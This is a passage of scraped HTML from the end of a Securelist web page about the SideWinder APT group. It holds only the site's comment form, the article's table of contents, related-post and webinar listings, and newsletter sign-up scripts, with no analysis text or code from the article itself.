Berdnikov</span></a> </li> </ul> </div> </div> <div id="comments" class="entry-comments c-article__comments js-comments-wrapper"> <p class="c-title--extra-small">Beyond the Surface: the evolution and expansion of the SideWinder APT group</p> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="u-hidden"> <small></small></h3><form action="https://securelist.com/wp-comments-post.php" method="post" id="loginform" class="comment-form"><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message">Required fields are marked <span class="required">*</span></span></p><div class="comment-form-comment"><textarea id="comment" name="comment" style="width:100%" rows="8" aria-required="true" placeholder="Type your comment here"></textarea></div><!-- .comment-form-comment --><p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" autocomplete="name" required="required" /></p> <p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="text" value="" size="30" maxlength="100" aria-describedby="email-notes" autocomplete="email" required="required" /></p> <script type="text/javascript"> document.addEventListener("input", function (event) { if (!event.target.closest("#comment")) return; try{ grecaptcha.render("recaptcha-submit-btn-area", { "sitekey" : "6LfQdrAaAAAAAEb_rTrwlbyc8z0Fa9CMjELY_2Ts", "theme" : "standard" }); }catch(error){/*possible duplicated instances*/} }); </script> <script src="https://www.google.com/recaptcha/api.js?hl=en&render=explicit" async defer></script> <div id="recaptcha-submit-btn-area"> </div> <noscript> <style type="text/css">#form-submit-save {display:none;}</style> <input name="submit" type="submit" id="submit-alt" tabindex="6" value="Submit Comment"/> </noscript> <p class="form-submit"><input name="submit" type="submit" id="commentsubmit" class="submit" value="Comment" /><a rel="nofollow" id="cancel-comment-reply-link" href="/sidewinder-apt/114089/#respond" style="display:none;">Cancel</a> <input type='hidden' name='comment_post_ID' value='114089' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> </p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="b0ccc24fa1" /></p><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="244"/><script>document.getElementById( "ak_js_1" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div><!-- #respond --> </div><!-- .entry-comments --> </div> <div class="o-col c-article__sidebar c-widgets--distributed u-hidden u-flex@md"> <div class="c-widget__wrapper"> <div class="c-highlight js-accordion is-active u-hidden u-block@md js-sticky-widget"> <div class="c-accordion-toggle js-accordion-toggle"> <div class="c-highlight__header"> <div class="c-highlight__icon"> <div class="u-block--theme-light u-hidden--theme-dark"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories.svg" /> </div> <div class="u-block--theme-dark u-hidden--theme-light"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories--invert.svg" /> </div> </div> <div class="c-highlight__title"> <p>Table of Contents</p> </div> </div> </div> <div class="js-accordion-container"> <div class="c-highlight__body"> <ul class='c-list-links'><li><a href="#infection-vectors">Infection vectors</a></li><li><a href="#rtf-exploit">RTF exploit</a></li><ul class='c-list-links'><li><a href="#initial-infection-lnk">Initial infection LNK</a></li></ul><li><a href="#downloader-module">Downloader module</a></li><li><a href="#moduleinstaller">ModuleInstaller</a></li><li><a href="#backdoor-loader-module">Backdoor loader module</a></li><li><a href="#stealerbot">StealerBot</a></li><ul class='c-list-links'><li><a href="#stealerbot-orchestrator">StealerBot Orchestrator</a></li><li><a href="#modules">Modules</a></li><ul class='c-list-links'><li><a href="#keylogger">Keylogger</a></li><li><a href="#screenshot-grabber">Screenshot Grabber</a></li><li><a href="#file-stealer">File Stealer</a></li><li><a href="#live-console">Live Console</a></li><li><a href="#rdp-credential-stealer">RDP Credential Stealer</a></li><li><a href="#token-grabber">Token Grabber</a></li><li><a href="#credential-phisher">Credential Phisher</a></li><li><a href="#uacbypass">UACBypass</a></li><li><a href="#downloader">Downloader</a></li><ul class='c-list-links'><li><a href="#installers">Installers</a></li><ul class='c-list-links'><li><a href="#installerpayload">InstallerPayload</a></li></ul><li><a href="#installerpayload_net">InstallerPayload_NET</a></li><li><a href="#infrastructure">Infrastructure</a></li></ul><li><a href="#victims">Victims</a></li><li><a href="#attribution">Attribution</a></li></ul></ul><li><a href="#iocs">IOCs</a></li><ul class='c-list-links'><li><a href="#malicious-documents">Malicious documents</a></li><li><a href="#rtf">Rtf</a></li><li><a href="#lnk">Lnk</a></li><li><a href="#backdoor-loader">Backdoor Loader</a></li><li><a href="#stealerbot">StealerBot</a></li><li><a href="#syncbotservicehijack-dll">SyncBotServiceHijack.dll</a></li><li><a href="#service-hijack">Service Hijack</a></li><li><a href="#backdoor-loader-devobj-dll">Backdoor Loader devobj.dll</a></li><li><a href="#domains-and-ips">Domains and IPs</a></li></ul> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">GReAT webinars</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2021-05-13T13:00:00+00:00" class="c-card__event-date"> 13 May 2021, 1:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-balalaika-edition/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-balalaika-edition/" class="c-card__link">GReAT Ideas. Balalaika Edition</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/borislarin/" > <span>Boris Larin</span></a> </li> <li> <a href="https://securelist.com/author/denislegezo/" > <span>Denis Legezo</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2021-02-26T12:00:00+00:00" class="c-card__event-date"> 26 Feb 2021, 12:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-green-tea-edition/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-green-tea-edition/" class="c-card__link">GReAT Ideas. Green Tea Edition</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/johnhultquist/" > <span>John Hultquist</span></a> </li> <li> <a href="https://securelist.com/author/brian_bartholomew/" > <span>Brian Bartholomew</span></a> </li> <li> <a href="https://securelist.com/author/suguru/" > <span>Suguru Ishimaru</span></a> </li> <li> <a href="https://securelist.com/author/vitalykamluk/" > <span>Vitaly Kamluk</span></a> </li> <li> <a href="https://securelist.com/author/seongsupark/" > <span>Seongsu Park</span></a> </li> <li> <a href="https://securelist.com/author/yusukeniwa/" > <span>Yusuke Niwa</span></a> </li> <li> <a href="https://securelist.com/author/motohikosato/" > <span>Motohiko Sato</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2020-06-17T13:00:00+00:00" class="c-card__event-date"> 17 Jun 2020, 1:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-malware-attribution-and-next-gen-iot-honeypots/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-malware-attribution-and-next-gen-iot-honeypots/" class="c-card__link">GReAT Ideas. Powered by SAS: malware attribution and next-gen IoT honeypots</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/marcopreuss/" > <span>Marco Preuss</span></a> </li> <li> <a href="https://securelist.com/author/denislegezo/" > <span>Denis Legezo</span></a> </li> <li> <a href="https://securelist.com/author/costin/" > <span>Costin Raiu</span></a> </li> <li> <a href="https://securelist.com/author/kurtb/" > <span>Kurt Baumgartner</span></a> </li> <li> <a href="https://securelist.com/author/dandemeter/" > <span>Dan Demeter</span></a> </li> <li> <a href="https://securelist.com/author/yaroslavshmelev/" > <span>Yaroslav Shmelev</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2020-08-26T14:00:00+00:00" class="c-card__event-date"> 26 Aug 2020, 2:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-actors-advance-on-new-fronts/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-actors-advance-on-new-fronts/" class="c-card__link">GReAT Ideas. Powered by SAS: threat actors advance on new fronts</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/ivankwiatkowski/" > <span>Ivan Kwiatkowski</span></a> </li> <li> <a href="https://securelist.com/author/maheryamout/" > <span>Maher Yamout</span></a> </li> <li> <a href="https://securelist.com/author/noushinshabab/" > <span>Noushin Shabab</span></a> </li> <li> <a href="https://securelist.com/author/pierredelcher/" > <span>Pierre Delcher</span></a> </li> <li> <a href="https://securelist.com/author/felixaime/" > <span>Félix Aime</span></a> </li> <li> <a href="https://securelist.com/author/giampaolodedola/" > <span>Giampaolo Dedola</span></a> </li> <li> <a href="https://securelist.com/author/santiago/" > <span>Santiago Pontiroli</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2020-07-22T14:00:00+00:00" class="c-card__event-date"> 22 Jul 2020, 2:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-hunting-and-new-techniques/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-hunting-and-new-techniques/" class="c-card__link">GReAT Ideas. Powered by SAS: threat hunting and new techniques</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/dimitrybestuzhev/" > <span>Dmitry Bestuzhev</span></a> </li> <li> <a href="https://securelist.com/author/costin/" > <span>Costin Raiu</span></a> </li> <li> <a href="https://securelist.com/author/pierredelcher/" > <span>Pierre Delcher</span></a> </li> <li> <a href="https://securelist.com/author/brian_bartholomew/" > <span>Brian Bartholomew</span></a> </li> <li> <a href="https://securelist.com/author/borislarin/" > <span>Boris Larin</span></a> </li> <li> <a href="https://securelist.com/author/arieljungheit/" > <span>Ariel Jungheit</span></a> </li> <li> <a href="https://securelist.com/author/fabioa/" > <span>Fabio Assolini</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">From the same authors</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/10/12092515/SL_featured_ToddyCat-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/10/12092515/SL_featured_ToddyCat-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" class="c-card__link">ToddyCat: Keep calm and check logs</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/goldenjackal-apt-group/109677/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/goldenjackal-apt-group/109677/" class="c-card__link">Meet the GoldenJackal APT group. Don’t expect any howls</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/toddycat/106799/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/21102251/intro_toddycat_apt-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/21102251/intro_toddycat_apt-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/toddycat/106799/" class="c-card__link">APT ToddyCat</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/transparent-tribe-part-2/98233/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130332/securelist_abs_5-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130332/securelist_abs_5-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/transparent-tribe-part-2/98233/" class="c-card__link">Transparent Tribe: Evolution analysis, part 2</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/transparent-tribe-part-1/98127/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130332/securelist_abs_5-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130332/securelist_abs_5-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/transparent-tribe-part-1/98127/" class="c-card__link">Transparent Tribe: Evolution analysis, part 1</a></h3> </header> </div> </article> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="c-widget-subscribe js-sticky-widget"> <div class="c-block__header"> <h5 class="c-title--small">Subscribe to our weekly e-mails</h5> <p>The hottest research right in your inbox</p> </div> <div class="c-form--float-labels js-float-labels"> <script type="text/javascript"></script> <div class='gf_browser_unknown gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_1505985678' ><div id='gf_1505985678' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_1505985678' id='gform_1505985678' class='subscribe-mc' action='/sidewinder-apt/114089/#gf_1505985678' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_1505985678' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_1505985678_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_1505985678_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_1505985678_3' type='hidden' class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_1505985678_2'><div class='gchoice gchoice_11_2_1'> <input class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_1505985678_11_2_1' /> <label for='choice_1505985678_11_2_1' id='label_1505985678_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button type="submit" class="gform_button button" id='gform_submit_button_1505985678' value="Sign up"> <svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span>Subscribe</span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&title=&description=&tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_11' id='gform_target_page_number_1505985678_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_1505985678_11' value='1' /> <input type='hidden' name='gform_random_id' value='1505985678' /><input type='hidden' name='gform_field_values' value='securelist_2020_form_location=sidebar' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_2" name="ak_js" value="125"/><script>document.getElementById( "ak_js_2" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_1505985678' id='gform_ajax_frame_1505985678' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 1505985678, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_1505985678').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_1505985678');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_1505985678').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_1505985678').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_1505985678').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_1505985678').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_1505985678').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_1505985678_11').val();gformInitSpinner( 1505985678, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [1505985678, current_page]);window['gf_submitting_1505985678'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_1505985678').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_1505985678').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [1505985678]);window['gf_submitting_1505985678'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_1505985678').text());}, 50);}else{jQuery('#gform_1505985678').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [1505985678, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">In the same category</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/blindeagle-apt/113414/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/16173535/SL-BlindEagle-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/16173535/SL-BlindEagle-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/blindeagle-apt/113414/" class="c-card__link">BlindEagle flying high in Latin America</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/eastwind-apt-campaign/113345/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/14084410/SL-EastWind-targeted-attack-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/14084410/SL-EastWind-targeted-attack-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/eastwind-apt-campaign/113345/" class="c-card__link">EastWind campaign: new CloudSorcerer attacks on government organizations in Russia</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/apt-trends-report-q2-2024/113275/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/06073438/apt-report-q2-2024-featured-image-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/06073438/apt-report-q2-2024-featured-image-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/apt-trends-report-q2-2024/113275/" class="c-card__link">APT trends report Q2 2024</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/cloudsorcerer-new-apt-cloud-actor/113056/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/07/03121455/CloudSorcerer-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/07/03121455/CloudSorcerer-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/cloudsorcerer-new-apt-cloud-actor/113056/" class="c-card__link">CloudSorcerer – A new APT targeting Russian government entities</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/apt-trends-report-q1-2024/112473/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="" sizes="(max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-300x169.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-1024x576.jpg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-768x432.jpg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-1536x864.jpg 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-2048x1152.jpg 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-622x350.jpg 622w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-740x416.jpg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-498x280.jpg 498w" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/apt-trends-report-q1-2024/112473/" class="c-card__link">APT trends report Q1 2024</a></h3> </header> </div> </article> </div> </div> </div> </div> <li id="text-22" class="widget widget_text"> <div class="textwidget"><p><a href="https://www.kaspersky.com/next?icid=gl_KNext_acq_ona_smm__onl_b2b_securelist_ban_sm-team___knext___" target="_blank" rel="noopener"><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/10092337/NEXT_310x420_EN.jpg" width="370" /></a></p> </div> </li> </div> </div> </div> </div> <div class="c-article__progress rpi-progress-bar"> <div class="c-article__progress-bar__position rpi-progress-bar__position"></div> <div class="rpi-progress-bar__percentage"></div> </div> </article> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal"> <div class="o-container-fluid"> <h5 class="c-block__title">Latest Posts</h5> <div class="o-row o-row--small-gutters@sm c-card__row c-card__row--fixed-width-down@sm js-slider-posts-mobile"> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/internet-exposed-gnss-receivers-in-2024/114548/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/13080938/SL-satellite-antennae-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/13080938/SL-satellite-antennae-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a 